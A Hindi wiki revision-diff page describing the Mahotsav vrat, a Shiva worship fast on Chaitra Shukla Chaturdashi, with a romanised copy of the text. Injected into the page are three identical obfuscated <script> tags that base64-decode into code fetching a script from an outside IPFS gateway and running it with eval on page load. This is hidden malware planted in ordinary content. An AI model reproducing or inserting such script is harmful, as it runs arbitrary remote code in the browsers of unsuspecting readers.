Difference between revisions of "महोत्सव व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*[[चैत्र]] [[शुक्ल पक्षा|शुक्ल]] की [[चतुर्दशी]] पर यह व्रत किया जाता है।
+
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] की [[चतुर्दशी]] पर यह व्रत किया जाता है।
 
*प्रति वर्ष [[शिव]] प्रतिमा को दूध आदि से स्नान करा कर अंजन, दमनक, बिल्व दल का अर्पण किया जाता है।
 
*प्रति वर्ष [[शिव]] प्रतिमा को दूध आदि से स्नान करा कर अंजन, दमनक, बिल्व दल का अर्पण किया जाता है।
 
*चावल के चूर्ण से बने दीपों से प्रतिमा की आरती की जाती है;  
 
*चावल के चूर्ण से बने दीपों से प्रतिमा की आरती की जाती है;  
*विभिन्न खाद्य पदार्थों का नैवेद्य, ढोल बजाना; शिव रथयात्रा; 'शिव प्रसन्न हों' कहना चाहिये।<ref>हेमाद्रि (व्रतखण्ड 2, 148-148, [[स्कन्द पुराण]] से उद्धरण)</ref>।  
+
*विभिन्न खाद्य पदार्थों का नैवेद्य, ढोल बजाना; शिव रथयात्रा; 'शिव प्रसन्न हों' कहना चाहिये।<ref>हेमाद्रि (व्रतखण्ड 2, 148-148, [[स्कन्द पुराण]] से उद्धरण</ref>।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 12:57, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl ki chaturdashi par yah vrat kiya jata hai.
  • prati varsh shiv pratima ko doodh adi se snan kara kar aanjan, damanak, bilv dal ka arpan kiya jata hai.
  • chaval ke choorn se bane dipoan se pratima ki arati ki jati hai;
  • vibhinn khady padarthoan ka naivedy, dhol bajana; shiv rathayatra; 'shiv prasann hoan' kahana chahiye.[1].

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 148-148, skand puran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>